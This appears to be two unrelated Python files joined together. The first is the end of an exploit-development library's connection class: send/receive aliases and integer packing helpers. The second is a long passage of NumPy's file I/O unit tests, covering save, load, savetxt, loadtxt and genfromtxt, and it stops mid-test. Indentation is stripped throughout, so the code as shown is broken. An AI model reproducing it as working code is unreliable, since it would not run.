def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
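# --- Editor's illustrative sketch (not part of the original module) ---
# The "minimal interface" methods above (recv_raw, send_raw, connected_raw,
# etc.) are all a child class has to provide. Assuming only this module's
# `tube` base class, a tiny in-memory loopback tube could look roughly like
# the following; the name `memtube` and its behaviour are hypothetical:
#
# class memtube(tube):
#     def __init__(self, data=''):
#         super(memtube, self).__init__()
#         self._data = data                 # bytes waiting to be received
#     def recv_raw(self, numb):
#         if not self._data:
#             raise EOFError                # closed connection, per the contract above
#         chunk, self._data = self._data[:numb], self._data[numb:]
#         return chunk
#     def send_raw(self, data):
#         self._data += data                # loop sent data back to the receive side
#     def connected_raw(self, direction):
#         return True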
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed) # must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
_assert_floatstr_lines_equal(lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def _assert_floatstr_lines_equal(actual_lines, expected_lines):
"""A string comparison function that also works on Windows + Python 2.5.
This is necessary because Python 2.5 on Windows inserts an extra 0 in
the exponent of the string representation of floating point numbers.
Only used in TestSaveTxt.test_complex_arrays, no attempt made to make this
more generic.
Once Python 2.5 compatibility is dropped, simply use `assert_equal` instead
of this function.
"""
for actual, expected in zip(actual_lines, expected_lines):
if actual != expected:
expected_win25 = expected.replace(b"e+00", b"e+000")
if actual != expected_win25:
msg = build_err_msg([actual, expected], '', verbose=True)
raise AssertionError(msg)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, b'1 21\r3 42\r')
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = { 'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([ 72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
# np.fromregex expects files opened in binary mode.
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = TextIO('1 2\n3 4')
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
"Test retrieving a header"
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = TextIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
